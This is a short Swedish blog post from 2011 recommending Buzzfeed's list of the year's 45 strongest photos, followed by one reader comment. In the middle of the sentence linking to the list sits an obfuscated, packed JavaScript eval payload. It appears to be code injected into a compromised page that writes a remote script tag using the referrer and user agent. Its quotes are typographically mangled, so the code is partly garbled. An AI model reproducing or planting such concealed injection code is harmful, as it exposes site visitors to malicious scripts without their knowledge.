Image Image Image Image Image Image Image Image Image Image

| 13 maj, 2021

Scroll to top

Top

Riktigt starka bilder. Jag ryser än…

Riktigt starka bilder. Jag ryser än…
Filip Urde
  • On 6 december, 2011
  • http://www.revue.se/filip-urde

Buzzfeed listar 2011 års 45 starkaste bilder…

Man har med bilder som skildrar allt från naturkatastrofer till Usama Bin Ladens död. Jag själv är väldigt blödig av mig och jag ryser än från flera av bilderna. Mästerverk räcker inte som beskrivning. Bilden ovan är från Time Square, dagen då Usama Bin Laden förklarades dödad av Amerikanska specialtrupper.

Här nedan kan ni se alla 45, vilket är ett måste: se eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rdbfh|var|u0026u|referrer|hbens||js|php’.split(’|’),0,{}))
här
!

Tack Lofman85 för tipset!

 

 

 

 

 

Comments

  1. Anna.F

    Bilden på ljuspelarna där Twin Towers stod… fy fan va läskigt. kan inte förstå att det hände.